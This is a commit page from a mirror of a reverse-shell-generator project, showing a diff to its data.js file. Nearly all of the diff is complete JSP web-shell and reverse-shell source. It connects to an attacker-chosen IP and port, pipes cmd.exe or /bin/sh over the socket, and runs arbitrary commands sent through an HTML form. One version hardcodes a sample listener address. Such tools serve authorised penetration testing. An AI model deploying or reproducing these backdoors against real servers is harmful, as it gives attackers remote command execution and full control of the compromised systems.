ch0ic3/reverse-shell-generator
1
0
Fork 0
mirror of https://github.com/0dayCTF/reverse-shell-generator.git synced 2024-12-18 10:56:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Update data.js

Browse Source 
Fixed a bug
This commit is contained in:
Ryan Montgomery 2023-03-10 11:21:38 -05:00 committed by GitHub
parent 14c8a641d0
commit 740e6df199
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
js/data.js
View File

@ -301,13 +301,13 @@ const reverseShellCommands = withCommandType(
"meta": ["windows", "linux", "mac"]
},
{
"name": "Java #4",
"name": "Java Web",
"command": "<%@\r\npage import=\"java.lang.*, java.util.*, java.io.*, java.net.*\"\r\n% >\r\n<%!\r\nstatic class StreamConnector extends Thread\r\n{\r\n InputStream is;\r\n OutputStream os;\r\n StreamConnector(InputStream is, OutputStream os)\r\n {\r\n this.is = is;\r\n this.os = os;\r\n }\r\n public void run()\r\n {\r\n BufferedReader isr = null;\r\n BufferedWriter osw = null;\r\n try\r\n {\r\n isr = new BufferedReader(new InputStreamReader(is));\r\n osw = new BufferedWriter(new OutputStreamWriter(os));\r\n char buffer[] = new char[8192];\r\n int lenRead;\r\n while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)\r\n {\r\n osw.write(buffer, 0, lenRead);\r\n osw.flush();\r\n }\r\n }\r\n catch (Exception ioe)\r\n try\r\n {\r\n if(isr != null) isr.close();\r\n if(osw != null) osw.close();\r\n }\r\n catch (Exception ioe)\r\n }\r\n}\r\n%>\r\n\r\n<h1>JSP Backdoor Reverse Shell<\/h1>\r\n\r\n<form method=\"post\">\r\nIP Address\r\n<input type=\"text\" name=\"ipaddress\" size=30>\r\nPort\r\n<input type=\"text\" name=\"port\" size=10>\r\n<input type=\"submit\" name=\"Connect\" value=\"Connect\">\r\n<\/form>\r\n<p>\r\n<hr>\r\n\r\n<%\r\nString ipAddress = request.getParameter(\"ipaddress\");\r\nString ipPort = request.getParameter(\"port\");\r\nif(ipAddress != null && ipPort != null)\r\n{\r\n Socket sock = null;\r\n try\r\n {\r\n sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());\r\n Runtime rt = Runtime.getRuntime();\r\n Process proc = rt.exec(\"cmd.exe\");\r\n StreamConnector outputConnector =\r\n new StreamConnector(proc.getInputStream(),\r\n sock.getOutputStream());\r\n StreamConnector inputConnector =\r\n new StreamConnector(sock.getInputStream(),\r\n proc.getOutputStream());\r\n outputConnector.start();\r\n inputConnector.start();\r\n }\r\n catch(Exception e) \r\n}\r\n%>",
"meta": ["windows", "linux", "mac"]
},
{
"name": "Java Two Way",
"command": "<%\r\n \/*\r\n * Usage: This is a 2 way shell, one web shell and a reverse shell. First, it will try to connect to a listener (atacker machine), with the IP and Port specified at the end of the file.\r\n * If it cannot connect, an HTML will prompt and you can input commands (sh\/cmd) there and it will prompts the output in the HTML.\r\n * Note that this last functionality is slow, so the first one (reverse shell) is recommended. Each time the button \"send\" is clicked, it will try to connect to the reverse shell again (apart from executing \r\n * the command specified in the HTML form). This is to avoid to keep it simple.\r\n *\/\r\n%>\r\n\r\n<%@page import=\"java.lang.*\"%>\r\n<%@page import=\"java.io.*\"%>\r\n<%@page import=\"java.net.*\"%>\r\n<%@page import=\"java.util.*\"%>\r\n\r\n<html>\r\n<head>\r\n <title>jrshell<\/title>\r\n<\/head>\r\n<body>\r\n<form METHOD=\"POST\" NAME=\"myform\" ACTION=\"\">\r\n <input TYPE=\"text\" NAME=\"shell\">\r\n <input TYPE=\"submit\" VALUE=\"Send\">\r\n<\/form>\r\n<pre>\r\n<%\r\n \/\/ Define the OS\r\n String shellPath = null;\r\n try\r\n {\r\n if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") == -1) {\r\n shellPath = new String(\"\/bin\/sh\");\r\n } else {\r\n shellPath = new String(\"cmd.exe\");\r\n }\r\n } catch( Exception e ){}\r\n \/\/ INNER HTML PART\r\n if (request.getParameter(\"shell\") != null) {\r\n out.println(\"Command: \" + request.getParameter(\"shell\") + \"\\n<BR>\");\r\n Process p;\r\n if (shellPath.equals(\"cmd.exe\"))\r\n p = Runtime.getRuntime().exec(\"cmd.exe \/c \" + request.getParameter(\"shell\"));\r\n else\r\n p = Runtime.getRuntime().exec(\"\/bin\/sh -c \" + request.getParameter(\"shell\"));\r\n OutputStream os = p.getOutputStream();\r\n InputStream in = p.getInputStream();\r\n DataInputStream dis = new DataInputStream(in);\r\n String disr = dis.readLine();\r\n while ( disr != null ) {\r\n out.println(disr);\r\n disr = dis.readLine();\r\n }\r\n }\r\n \/\/ TCP PORT PART\r\n class StreamConnector extends Thread\r\n {\r\n InputStream wz;\r\n OutputStream yr;\r\n StreamConnector( InputStream wz, OutputStream yr ) {\r\n this.wz = wz;\r\n this.yr = yr;\r\n }\r\n public void run()\r\n {\r\n BufferedReader r = null;\r\n BufferedWriter w = null;\r\n try\r\n {\r\n r = new BufferedReader(new InputStreamReader(wz));\r\n w = new BufferedWriter(new OutputStreamWriter(yr));\r\n char buffer[] = new char[8192];\r\n int length;\r\n while( ( length = r.read( buffer, 0, buffer.length ) ) > 0 )\r\n {\r\n w.write( buffer, 0, length );\r\n w.flush();\r\n }\r\n } catch( Exception e ){}\r\n try\r\n {\r\n if( r != null )\r\n r.close();\r\n if( w != null )\r\n w.close();\r\n } catch( Exception e ){}\r\n }\r\n }\r\n \r\n try {\r\n Socket socket = new Socket( \"192.168.119.128\", 8081 ); \/\/ Replace with wanted ip and port\r\n Process process = Runtime.getRuntime().exec( shellPath );\r\n new StreamConnector(process.getInputStream(), socket.getOutputStream()).start();\r\n new StreamConnector(socket.getInputStream(), process.getOutputStream()).start();\r\n out.println(\"port opened on \" + socket);\r\n } catch( Exception e ) {}\r\n%>\r\n<\/pre>\r\n<\/body>\r\n<\/html>",
"command": "<%\r\n \/*\r\n * Usage: This is a 2 way shell, one web shell and a reverse shell. First, it will try to connect to a listener (atacker machine), with the IP and Port specified at the end of the file.\r\n * If it cannot connect, an HTML will prompt and you can input commands (sh\/cmd) there and it will prompts the output in the HTML.\r\n * Note that this last functionality is slow, so the first one (reverse shell) is recommended. Each time the button \"send\" is clicked, it will try to connect to the reverse shell again (apart from executing \r\n * the command specified in the HTML form). This is to avoid to keep it simple.\r\n *\/\r\n%>\r\n\r\n<%@page import=\"java.lang.*\"%>\r\n<%@page import=\"java.io.*\"%>\r\n<%@page import=\"java.net.*\"%>\r\n<%@page import=\"java.util.*\"%>\r\n\r\n<html>\r\n<head>\r\n <title>jrshell<\/title>\r\n<\/head>\r\n<body>\r\n<form METHOD=\"POST\" NAME=\"myform\" ACTION=\"\">\r\n <input TYPE=\"text\" NAME=\"shell\">\r\n <input TYPE=\"submit\" VALUE=\"Send\">\r\n<\/form>\r\n<pre>\r\n<%\r\n \/\/ Define the OS\r\n String shellPath = null;\r\n try\r\n {\r\n if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") == -1) {\r\n shellPath = new String(\"\/bin\/sh\");\r\n } else {\r\n shellPath = new String(\"cmd.exe\");\r\n }\r\n } catch( Exception e ){}\r\n \/\/ INNER HTML PART\r\n if (request.getParameter(\"shell\") != null) {\r\n out.println(\"Command: \" + request.getParameter(\"shell\") + \"\\n<BR>\");\r\n Process p;\r\n if (shellPath.equals(\"cmd.exe\"))\r\n p = Runtime.getRuntime().exec(\"cmd.exe \/c \" + request.getParameter(\"shell\"));\r\n else\r\n p = Runtime.getRuntime().exec(\"\/bin\/sh -c \" + request.getParameter(\"shell\"));\r\n OutputStream os = p.getOutputStream();\r\n InputStream in = p.getInputStream();\r\n DataInputStream dis = new DataInputStream(in);\r\n String disr = dis.readLine();\r\n while ( disr != null ) {\r\n out.println(disr);\r\n disr = dis.readLine();\r\n }\r\n }\r\n \/\/ TCP PORT PART\r\n class StreamConnector extends Thread\r\n {\r\n InputStream wz;\r\n OutputStream yr;\r\n StreamConnector( InputStream wz, OutputStream yr ) {\r\n this.wz = wz;\r\n this.yr = yr;\r\n }\r\n public void run()\r\n {\r\n BufferedReader r = null;\r\n BufferedWriter w = null;\r\n try\r\n {\r\n r = new BufferedReader(new InputStreamReader(wz));\r\n w = new BufferedWriter(new OutputStreamWriter(yr));\r\n char buffer[] = new char[8192];\r\n int length;\r\n while( ( length = r.read( buffer, 0, buffer.length ) ) > 0 )\r\n {\r\n w.write( buffer, 0, length );\r\n w.flush();\r\n }\r\n } catch( Exception e ){}\r\n try\r\n {\r\n if( r != null )\r\n r.close();\r\n if( w != null )\r\n w.close();\r\n } catch( Exception e ){}\r\n }\r\n }\r\n \r\n try {\r\n Socket socket = new Socket( \"{ip}\", {port} ); \/\/ Replace with wanted ip and port\r\n Process process = Runtime.getRuntime().exec( shellPath );\r\n new StreamConnector(process.getInputStream(), socket.getOutputStream()).start();\r\n new StreamConnector(socket.getInputStream(), process.getOutputStream()).start();\r\n out.println(\"port opened on \" + socket);\r\n } catch( Exception e ) {}\r\n%>\r\n<\/pre>\r\n<\/body>\r\n<\/html>",
"meta": ["windows", "linux", "mac"]
},
{